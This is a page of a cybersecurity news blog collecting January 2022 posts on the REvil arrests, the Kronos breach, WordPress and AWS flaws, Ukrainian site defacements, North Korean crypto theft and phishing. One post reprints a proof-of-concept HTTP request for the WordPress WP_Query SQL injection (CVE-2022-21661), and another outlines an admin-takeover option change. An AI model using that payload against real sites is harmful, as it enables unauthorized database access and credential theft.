Home Blog Page 57

Trying to make sense of the REvil Arrests by the FSB

By

Steven Black (n0tst3)

-

14 January 2022

CyberSecurity

On 14 January 2022, our seemingly quiet Friday afternoons were shattered by a piece of breaking news, detailing the arrest of several REvil (aka Sodinokibi) members. Ransomware members’ arrests are always welcomed – and even more so when they are followed by video evidence of the arrests (you gotta love them; shades of the Bourne Identity with the camerawork!).

However, the team’s first reaction was nothing short of a surprise. Why is that? This time the news came from an unusual source: the Russian Federal Security Service (FSB, or Федеральная служба безопасности in Russian). Before delving into why this was a strange move and how we’re making sense of it, let’s discuss the facts.

According to a press release published on its website, the FSB carried out these arrests following a request from the United States that came with detailed information on the operators of this ransomware and their previous activities.

In cooperation with the Investigation Department of the Russian Ministry of Internal Affairs, the FSB conducted several raids to seize members’ assets, including over 426 million rubles, including in cryptocurrency, 600 thousand US dollars, 500 thousand euros, as well as computer equipment, crypto wallets used to commit crimes, and 20 luxury cars purchased with money obtained from crime.

REvil arrests seizure — Footage from the members’ arrest

The report further claims that as a result of this operation, the REvil gang no longer exists, and the technological infrastructure used to conduct their attacks has been “neutralized.”

Interestingly enough, the press release states that the arrested members are being charged with committing crimes under Part 2 of Art. 187 “ “Illegal circulation of means of payment” of the Criminal Code of Russia”, without any mentions of charges related to computer-fraud activities.

WHO WAS REVIL (SODINOKIBI)?

The ransomware group REvil (aka Sodinokibi) has been one of the most significant characters in the evolving ransomware drama playing out over the past few years. The REvil ransomware variant was first detected in April 2019, and although the group initially focused on targeting Asia-based entities, the ransomware operators and associated affiliates became indiscriminate in their choice of victim and sector (apart from Russia-based organizations, as per ransomware tradition). REvil’s bold and brazen attacks, such as targeting the Kaseya desktop management software and the meat processing organization JBS, meant that the group has rarely been out of the news.

The group suddenly disappeared from the scene in July 2021, after ideally gathering enough money to retire happily on a remote island somewhere (although they’ve probably been in some decadent Russian outskirts).

What happened to them?

We still have no clue, but we tried to figure it out with our Analysis of Competing Hypotheses exercise that we carried out last summer. After that, the group stopped carrying out attacks, and one of its representatives showed up in October to discuss their domains’ alleged hijacking and the group’s intention to disappear from the scene.

And then after that? Absolutely nothing. No one has heard from the group’s members until today. As I said before, we couldn’t help but be surprised by this supposed Russian-American cooperation in the arrest of these 14 REvil members – and we’re left with one simple question: “Why?”.

GEOPOLITICAL SITUATION AND UNATTRIBUTED CYBERATTACKS

Before analyzing these arrests, let’s take a step back to analyze the bigger picture. From a geopolitical perspective, we’ve observed a growing tension between Russia and Ukraine in the past weeks. Russia conducted a build-up of more than 100,000 of its troops along the Ukrainian border and conducted several military exercises.

Recent talks between the West and Russia to defuse the crisis also appeared to have reached an impasse; this week, a top Russian negotiator said diplomatic efforts had reached a “dead end.” There are credible fears of a Russian invasion into Ukraine once again, with Russia reportedly compelled to react to Ukraine’s attempts to move towards NATO membership, which would result in deepening military and economic ties with the West.

In an operation possibly tied to what we’ve just discussed, today we saw reports emerging of a significant defacement cyberattack hitting several Ukrainian government websites and making them inaccessible.

The attack came with an ominous warning for Ukrainians, stating they should “be afraid and expect the worst.” This attack reportedly targeted 15 websites in Ukraine that used the October content management system and resulted in websites being defaced. This included the Ministry of Foreign Affairs, Cabinet of Ministers, Treasury, and others.

Attribution for this attack is still uncertain, but the tactics, techniques, and procedures (TTPs) of the attack – along with a suspicious timeline – suggested that a Russian state-encouraged actor may have possibly been behind this attack.

MAKING SENSE OF THESE ARRESTS

This leads to today’s arrests. The cooperation and the timing of these arrests definitely seems noteworthy to us. We’re used to seeing Russia and the US in opposition when discussing cyber-related events, not cooperating against cybercriminal operations. So why did the FSB conduct these arrests?

At the time of writing, we don’t have a definitive answer. However, based on the events observed historically, we can assess the reasons behind this operation. These arrests seem to indicate some sort of willingness to provide concessions to the US and its allies, or at the very least, some semblance of cooperation. For example, increased cooperation in the cybersphere if diplomatic negotiations between the two countries would evolve into more favorable conditions for Moscow.

Additionally, it is important to notice that REvil hasn’t been active for quite a few months now. Therefore, masked behind an apparent sign of goodwill, we have to stress that REvil could greatly work as a scapegoat for other ransomware operations, and thus – again – of what cooperation between Russia and the US could look like under the right conditions.

When these big events in the cybersphere happen, it is always important to monitor how cybercriminals react. Echoing what we mentioned above, chatter on Russian cybercriminal forums suggested that REvil were “pawns in a big political game”. In addition, another user suggested that Russia made the arrests “on purpose” so that the United States would “calm down” (in relation to potential sanctions tied to the Ukrainian border disputes).

Forum user suggesting REvil members have been used as pawns — Forum user suggesting REvil members have been used as pawns

It’s possible that the FSB raided REvil knowing that the group was high on the priority list for the US, while considering that their removal would have a small impact on the current ransomware landscape. These arrests could also have served a secondary purpose to warn other ransomware groups. REvil made international news last year in its targeting of organizations such as JBS and Kaseya, which were high profile and impactful attacks; a very public series of raids could be interpreted by some as a message to be mindful of their targeting.

Ultimately, these arrests represent a significant display of potential cooperation but behind them lie critical caveats that need to be taken into account into a deeper assessment.

We think you may enjoy reading,

FSB arrests REvil ransomware gang members

Return to CyberSecurity News

Please login to bookmark

Kronos hackers stole personal info of Metro-North workers, MTA says

By

Steven Black (n0tst3)

-

14 January 2022

CyberSecurity

Ransomware hackers who breached the network of MTA timeclock provider Kronos made off with the personal information of several current and former Metro-North employees, transit leadership said Thursday.

“Kronos recently informed us that some files containing personal information of some current and former MTA employees at one of our agencies – Metro-North Railroad – were accessed by the perpetrators of this ransomware incident,” MTA Chief Administrative Officer Lisette Camilo said in an email to the authority’s approximately 70,000 employees.

“The information accessed did not include Social Security numbers, driver’s license numbers, bank or other financial institution account numbers, or biometric information,” Camilo’s email said. “At this time, Kronos has no evidence that the personal information of any other MTA employees was accessed.”

The MTA has arranged with Kronos and its parent company to offer all current and former employees two years of free credit monitoring and identity theft protection, the email said.

The MTA is offering all current and former employees two years of free credit monitoring and identity theft protection in the wake of the stolen information.

The back-end of the MTA’s high-end timekeeping system went dark Dec. 13 after Kronos experienced the ransomware attack over the previous weekend.

Return to cybersecurity news

Please login to bookmark

Three Plugins with Same Bug Put 84K WordPress Sites at Risk

By

Steven Black (n0tst3)

-

14 January 2022

wordpress

Researchers discovered vulnerabilities that can allow for full site takeover in login and e-commerce add-ons for the popular website-building platform.

Researchers have discovered three WordPress plug-ins with the same vulnerability that allows an attacker to update arbitrary site options on a vulnerable site and completely take it over. Exploiting the flaw does require some action from the site administrator, however.

On Nov. 5, 2021, the Wordfence Threat Intelligence team started a process to disclose a vulnerability researchers had found in “Login/Signup Popup,” a WordPress plug-in installed on more than 20,000 sites, Wordfence’s Chloe Chamberland wrote in a post published online Thursday.

However, a few days later they discovered that the flaw was present in two other plug-ins by the same developer, who goes by the online name of XootiX. They are “Side Cart Woocommerce (Ajax),” which has been installed on more than 60,000 sites, and “Waitlist Woocommerce (Back in stock notifier),” which has been installed on more than 4,000.

Login/Signup Popup is a “simple and lightweight” plug-in aimed at streamlining a site’s registration, login and password reset processes, according to its description online. Side Cart Woocommerce – designed to work with the Woocommerce plugin for creating an e-commerce store – allows a site’s users to access items they’ve placed into a shopping cart using from anywhere on the site. Waitlist Woocommerce – also to be used with Woocommerce – adds the functionality of tracking demand for out-of-stock items to an e-commerce site.

As of now, all of the plug-ins have been updated and the flaw patched, according to the post. On Nov. 24, the developer released a patched version of Login/Signup Popup as version 2.3. Later, on Dec. 17, a patched version of Waitlist Woocommerce, version 2.5.2, was released; and a patched version of Side Cart Woocommerce, version 2.1, was released.

Still, the discovery of the bug’s multiple occurrences reflects an ongoing issue with WordPress plug-ins being riddled with flaws. Indeed, vulnerabilities in the plug-ins skyrocketed with triple-digit growth in 2021, according to RiskBased Security.

wordpress bug

How the Flaw Works

The vulnerability found by the Wordfence team is fairly straightforward, Chamberland wrote. All three plug-ins register the save_settings function, which is initiated via a wp_ajax action, they said.

In each of the plug-ins, “this function was missing a nonce check, which meant that there was no validation on the integrity of who was conducting the request,” according to the post.

What this sets up is a scenario in which an attacker can craft a request that would trigger the AJAX action and execute the function, Chamberland wrote. However, action from the site’s administrator – “like clicking on a link or browsing to a certain website while the administrator was authenticated to the target site” – is needed to fully exploit the flaw, she said.

In these cases, “the request would be successfully sent and trigger the action which would allow the attacker to update arbitrary options on that website,” she explained in the post.

Exploiting Arbitrary Options Update vulnerabilities in this way is something threat actors “frequently abuse,” allowing them to update any option on a WordPress website and to ultimately take it over, Chambers noted.

This latter privilege occurs if an attacker sets “the user_can_register option to true and the default_role option to the administrator so that they can register on the vulnerable site as an administrator,” she explained.

Risks and Mitigations

Though the fact that the flaws found in the plug-ins require administrator action makes them “less likely to be exploited,” they can have a “significant impact” if they are exploited, Chamberland said.

“As such, it serves as an incredibly important reminder to remain aware when clicking on links or attachments and to ensure that you are regularly keeping your plug-ins and themes up to date,” she advised.

Recommended actions for WordPress users who use the plug-ins are to verify that their site has been updated to the latest patched version available for each of them. That would be version 2.3 for “Login/Signup Popup”, version 2.5.2 for “Waitlist Woocommerce (Back in stock notifier )”, and version 2.1 for “Side Cart Woocommerce (Ajax),” according to the post.

All Wordfence users are protected against vulnerability, according to the post. Wordfence Premium users received a firewall rule to protect against any exploits targeting them on Nov. 5, and sites still using the free version of Wordfence received the same protection on Dec. 5.

Return to cybersecurity news

Please login to bookmark

FSB arrests REvil ransomware gang members

By

Steven Black (n0tst3)

-

14 January 2022

russia

The Russian Federal Security Service (FSB) said today that it has raided and shut down the operations of the REvil ransomware gang.

Raids were conducted today at 25 residents owned by 14 members suspected to be part of the REvil team across Moscow, St. Petersburg, Leningrad, and the Lipetsk regions.

This comes just a day after Ukrainian authorities confirmed they had made arrests including one of an alleged ransomware gang ringleader.

Authorities said they seized more than 426 million rubles, $600,000, and €500,000 in cash, along with cryptocurrency wallets, computers, and 20 expensive cars.

“The detained members of the [organized criminal structure] were charged with committing crimes under Part 2 of Art. 187 ‘Illegal circulation of means of payment’ of the Criminal Code of Russia,” the FSB said in a press release today.

The FSB, which serves as Russia’s internal intelligence agency, said it conducted its operation at the request of US authorities, which were notified of their results.

The raid comes after President Biden and US authorities have pressured Russian President Vladimir Putin repeatedly over the summer to crack down on the Russian underground cybercrime ecosystem, which harbors many of today’s top ransomware crews.

Kaseya attack aftermath

The REvil gang was one of the most active ransomware crews last year, being responsible for the attack against JBS Foods, which impacted the meat supply across the US and Australia in May, and the attack on IT provider Kaseya during the 4th of July weekend.

After US authorities started pressuring Russian officials, the REvil gang shuttered operations in July but then attempted a comeback in September before having some of their dark web servers seized by US authorities.

Seven other REvil gang members were also arrested throughout 2021, following operations coordinated by Europol.

The FSB has not released the names of any of the suspects.

“Representatives of the competent US authorities were informed about the results of the operation,” the agency said.

You may also enjoy reading,

Ukrainian authorities arrest suspected ransomware ringleader

FSB Press Release

Return to cybersecurity news

Trying to make sense of the REvil Arrests by the FSB

Please login to bookmark

AWS Patches Glue Bug That Put Customer Data at Risk

By

Steven Black (n0tst3)

-

14 January 2022

aws

Dubbed “Superglue” by the Orca Security Research Team, the bug was made possible by an internal misconfiguration within the service.

AWS Glue is a serverless data integration service that allows customers to discover and combine data for machine learning, analytics and app development. Given that it can access large volumes of potentially sensitive data, it could be an attractive target for hackers.

“During our research, we were able to identify a feature in AWS Glue that could be exploited to obtain credentials to a role within the AWS service’s own account, which provided us full access to the internal service API,” Orca Security explained.

“In combination with an internal misconfiguration in the Glue internal service API, we were able to further escalate privileges within the account to the point where we had unrestricted access to all resources for the service in the region, including full administrative privileges.”

The vendor claimed to have been able to assume roles in AWS customer accounts that are trusted by Glue and query and modify AWS Glue service-related resources in a region. These included Glue jobs, dev endpoints, workflows, crawlers and triggers.

The research team was at pains to point out that it only used its own accounts for this project and that no AWS Glue customers were compromised as a result.

AWS worked swiftly with the team to fix the problem.

“Today, Orca Security, a valued AWS partner, helped us detect and mitigate a misconfiguration before it could impact any customers,” explained AWS principal engineer Anthony Virtuoso.

“We greatly appreciate their talent and vigilance, and we would like to thank them for the shared passion of protecting AWS customers through their findings.”

The same research team revealed a second vulnerability in AWS this week dubbed “BreakingFormation.”

Also now fixed by AWS, this zero-day bug could have allowed attackers to leak sensitive files on targeted service machines and grab credentials related to internal AWS infrastructure services.

Apple fixes exploited iOS, iPadOS zero-day (CVE-2022-42827)

Related

Return to cybersecurity news

Please login to bookmark

Ukrainian Government Websites Forced Offline in “Massive” Cyber-Attack

By

Steven Black (n0tst3)

-

14 January 2022

The attack, which also targeted the UK, US and Swedish embassies in Ukraine, is suspected to have been perpetrated by Russian threat actors amid significant tensions between the two nations.

Ukraine has been hit by a “massive” cyber-attack, forcing more than a dozen government websites offline, it has been reported today.

This attack comes just a day after we were able to report that Ukrainian authorities made a number of arrests including that of an alleged ransomware ringleader.

Ukrainian authorities arrest suspected ransomware ringleader

The websites taken offline include the Ukrainian ministry of foreign affairs and the education ministry. Before going down, a sinister message appeared stating: “Ukrainians! … All information about you has become public. Be afraid and expect worse. It’s your past, present and future.”

The message also reproduced the Ukrainian flag and map crossed out and referenced “historical land.” This appeared in three languages: Ukrainian, Russian and Polish.

The Guardian quoted the Ukrainian foreign ministry’s spokesperson, Oleg Nikolenko, who said: “As a result of a massive cyber-attack, the website of the ministry of foreign affairs and other government agencies are temporarily down.

“Our specialists have already started restoring the work of IT systems, and the cyber-police has opened an investigation.”

Ukraine’s SBU security service said that no personal data was leaked in the attack.

The incident has come amid heightened tensions in the region, with the Kremlin demanding assurances that Ukraine will not join Nato. Russia has deployed 100,000 troops to the border with Ukraine.

The EU’s top diplomat, Josep Borrell, condemned the attacks, stating: “We are going to mobilize all our resources to help Ukraine to tackle this. Sadly, we knew it could happen.”

He added: “I can’t blame anybody as I have no proof. But we can imagine.”

Commenting on the story, Anthony Gilbert, cyber threat intelligence lead at Bridewell Consulting, said: “At the moment it’s unclear how the attack occurred or who is behind it, but given the current situation, it’s highly likely it was politically charged as there appears to be no financial motivation. The attackers probably wanted to give a warning or ignite civil unrest and spread further undercurrents of no confidence in the government.”

Toby Lewis, global head of threat analysis at Darktrace, said it was too early to jump to conclusions about the nature of the attack and its perpetrators. “We should be cautious around labelling this as a ‘sophisticated’ attack. Some cyber-attacks are more successful than others; some are advanced and others less so. A distributed denial of service (DDoS) attack, for example, which is an attempt to bring down websites or networks by overwhelming the webserver with internet traffic, is not particularly sophisticated and relatively easy to mitigate.

“Some of the website defacements, such as those left on the education website and the ministry of foreign affairs, are designed to mimic ‘nationalist/separatist groups’ with claims that the attack was done in the name of the UPA (Ukrainian Separatist Army), which has not existed for over 50 years. Attribution is impossible to do with digital data alone, and it is not unlikely that this is a false flag to divert attention away from the true perpetrators, to stir up unrest or simply impact the credibility of the website owners.”

Russia has previously been blamed for cyber-attacks on Ukraine in recent years. These include attacks in 2015 and 2016 that took out large parts of the country’s power grids.

Return to Cybersecurity News

Please login to bookmark

Report: In 2021 North Korea Hacked Nearly $400M in Crypto

By

Steven Black (n0tst3)

-

14 January 2022

north korea

North Korean hackers launched at least seven attacks on cryptocurrency platforms last year to steal almost $400 million worth of digital assets, according to a report by blockchain analysis firm Chainalysis.

“From 2020 to 2021, the number of North Korean-linked hacks jumped from four to seven, and the value extracted from these hacks grew by 40%,” the report said.

The attacks primarily targeted investment firms and centralized exchanges.

The report stated that the hackers siphoned the funds from the organizations’ internet-connected “hot wallets” into DPRK-controlled addresses by using complex tactics including phishing lures, code exploits, malware, and advanced social engineering.

“Once North Korea gained custody of the funds, they began a careful laundering process to cover up and cash out,” the report said.

In 2021, Ethereum and Bitcoin accounted for 58% and 20% of the funds, respectively; 22% came from ERC-20 tokens or altcoins.

The report also said, citing the United Nations Security Council, North Korea used the money by hacks to support its weapons of mass destruction (WMD) and ballistic missile-related programs.

As per the analysis report, the Lazarus Group — a hacking group that is part of North Korea’s primary intelligence agency, the Reconnaissance General Bureau — is suspected of carrying out the attacks. The Lazarus Group has previously been accused of the cyberattack on Sony Pictures Entertainment and WannaCry.

More than 65% of North Korea’s stolen funds were laundered through mixers — software tools that pool and scramble digital assets from thousands of addresses.

North Korea also owns unlaundered crypto funds, which are believed to be worth $170 million, from 49 separate hacks spanning from 2017 to 2021.

“It’s unclear why the hackers would still be sitting on these funds, but it could be that they are hoping law enforcement interest in the cases will die down, so they can cash out without being watched. Whatever the reason may be, the length of time that DPRK is willing to hold on to these funds is illuminating, because it suggests a careful plan, not a desperate and hasty one,” the report said.

Read the full report
Return to Cybersecurity News

You may enjoy reading,

North Korean Hacking Group Target Russian Foreign Ministry

Please login to bookmark

WordPress Core 5.8.2 – ‘WP_Query’ SQL Injection [PoC]

By

Steven Black (n0tst3)

-

13 January 2022

EXPLOIT

# Exploit Title: WordPress Core 5.8.2 - 'WP_Query' SQL Injection
# Date: 11/01/2022
# Exploit Author: Aryan Chehreghani
# Vendor Homepage: https://wordpress[.]org
# Software Link: https://wordpress[.]org/download/releases
# Version: < 5.8.3
# Tested on: Windows 10
# CVE : CVE-2022-21661

# [ VULNERABILITY DETAILS ] : 

#This vulnerability allows remote attackers to disclose sensitive information on affected installations of WordPress Core,
#Authentication is not required to exploit this vulnerability, The specific flaw exists within the WP_Query class,
#The issue results from the lack of proper validation of a user-supplied string before using it to construct SQL queries,
#An attacker can leverage this vulnerability to disclose stored credentials, leading to further compromise.

# [ References ] : 

https://wordpress[.]org/news/category/releases
https://www.zerodayinitiative[.]com/advisories/ZDI-22-020
https://hackerone[.]com/reports/1378209

# [ Sample Request ] :

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Upgrade-Insecure_Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.99
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Sec-Fetch-User: ?1
Cache-Control: max-age=0
Connection: close 
Content-Type: application/x-www-form-urlencoded

action=<action_name>&nonce=a85a0c3bfa&query_vars={"tax_query":{"0":{"field":"term_taxonomy_id","terms":["<inject>"]}}}

How to fix?

Update to => 5.8.3

Please login to bookmark

Teen Security Specialist gains remote control of over 20 Teslas

By

Steven Black (n0tst3)

-

13 January 2022

tesla hacked

Teen Gains Full control over car doors, security system, and more

Facepalm: This week, a teenager reported that he has gained remote access to around two dozen Tesla cars in multiple countries and is trying to contact their owners. The list of things he can do to the affected vehicles is long and dangerous.

Nineteen-year-old IT security specialist David Columbo reported in a Twitter thread Monday and Tuesday 10th-11th Jan 2022, that he gained complete control of over 25 Teslas in 13 countries without their owners knowing. He doesn’t want to disclose exactly how he did it until he reports the vulnerability to the non-profit Mitre. However, Columbo did say it was due to errors on the owners’ part, not a security flaw in Tesla’s software.

So, I now have full remote control of over 20 Tesla’s in 10 countries and there seems to be no way to find the owners and report it to them…
— David Colombo (@david_colombo_) January 10, 2022

Columbo said he could search the precise location of each car, disable their security, open their doors and windows even while they’re on the road, play music and YouTube videos at full volume, and more. While Columbo can’t remotely drive the cars, he could steal them if he were at their physical locations.

Tesla’s security team has already told Columbo they’re looking into it.

Even though Columbo says this isn’t Tesla’s fault, it could still be a PR issue for the company, painting the cars as ever more vulnerable in consumers’ minds. Near the end of last year, Tesla recalled a significant number of vehicles sold in the US over trunk lid problems. This incident could also affect the development of Tesla’s self-driving mode, which is still in beta.

Real InfoSecurity reached out to Tesla this evening and was able to confirm the correspondence between the security researcher and Tesla.

We think you may enjoy reading,

Mastering Google Dorking: Expanding Scope, Reconnaissance, and Resources

Return to cybersecurity news

Mastering Google Dorking: Expanding Scope, Reconnaissance, and Resources

Please login to bookmark

How Cybercriminals Are Cashing in on a Culture of ‘Yes’

By

Steven Black (n0tst3)

-

13 January 2022

CyberSecurity

What is the culture of Yes?

It’s hard to say no. To friends asking you to help you move with their truck next weekend, to a second helping of Grandma’s pumpkin pie, and especially to that pop-up window that asks for your personal data online. We’re wired to always respond with “yes.”

And the reason for this behaviour is fairly straightforward: The carrot is always more apparent (and attractive) than the stick. Whether it’s for access to the latest celebrity gossip, updates on local news, or acquiring the latest “toy of the year” for your children, the reward is always front of mind. The potential harm of giving out an email or a phone number doesn’t immediately reveal itself.

Yes No — Yes? No?

Casualties of the Culture of Yes
This default “yes” has long been exploited by threat actors. Some attacks cast a wide net to entice everyone, such as the recent GriftHorse malware that infected over 10 million Android phones. Notifications promised special offers in exchange for the user’s phone number, which the scammer then used to surreptitiously sign up the user for a $35-per-month service.

Other malicious actions might target specific, powerful individuals, an approach often favoured by nation-states. In this approach, phishing emails may promise access to resources or webinars in exchange for emails and passwords. This tactic has been used in several recent hacking efforts associated with Russia and Iran.

And while it may seem isolated to the consumer realm, the issue is affecting enterprises as well. A recent survey showed that 59% of workers are using corporate emails for personal use, opening them up to phishing attacks looking for someone to say yes. A full 46% of Gen Z survey participants would open up the link or attachment in a suspected phishing email, potentially providing a banner day for the authors of the malicious email.

Continued Reinforcement of the Yes
Our culture is also reinforcing the culture of yes through new technology and usage patterns. For example, the rise in “touchless experiences” during the pandemic has given new life to QR codes — if you see it, you scan it. QR codes rely upon the default yes that we’ve all grown accustomed to. These visual bookmarks, while useful, subject people to the same risks as the GriftHorse campaign: The browser is sent to an unknown, potentially malicious site.

While consumers are learning to be wary of unknown sites and applications, QR codes without guardrails open them back up to potentially dangerous locations and code that seeks to do them harm or can secretly log their location by essentially “checking them in” at a particular place and time via device fingerprinting.

This culture of yes, then, presents real dangers to both our privacy and security. But the answer to this moment — this world in which the default response is yes — is not to become completely cynical about the world and everyone in it. We must resist the temptation to flip to the other extreme, a default “no.” Instead, it’s more of a reset in our thinking — an attempt to find a balance between extremes as we interact in the digital world.

How to Find Balance (and Security) for Your Organization
Shifting from a culture of yes to a more thoughtful, balanced perspective requires three things: technology, training, and commitment.

First, technology must be used to inform and modify behaviour; thoughtful choices then become easier for people than just saying “yes.” To combat phishing, for example, clear identification of external emails can help users identify suspicious content. Along with clear identification of risk, phish reporting buttons should be prominent in the interface so that it’s obvious what to do with suspect email. Doing the legwork for the user funnels them into making good choices. These measures can be enhanced with technology that should be table stakes for organizations already: browser isolation, endpoint detection and response, and the like.

Second, once the technology is in place, we must train our people on how to use them effectively. Part of this is informative videos or seminars, but also having a feedback loop such as a Slack channel for informal advice is helpful — this builds the community awareness and builds rapport between the security team and the rest of the organization. Conducting regular phishing tests will also reinforce good habits and provide qualitative analysis for how culture change is progressing.

Finally, stay committed to your progress. If tactics are switched up too frequently, or if the culture change is not supported fully by leadership, any shift in thinking will likely cause users to revert back to the previous pattern of always saying yes to everything.

Rather than extremes, a thoughtful balance is essential if we are to ensure that our culture is served by our technology. The alternative is to sacrifice our privacy and security in our race to always say “yes.”

Read more related Cybersecurity articles

What is informationsecurity?

Please login to bookmark

1...565758...79 Page 57 of 79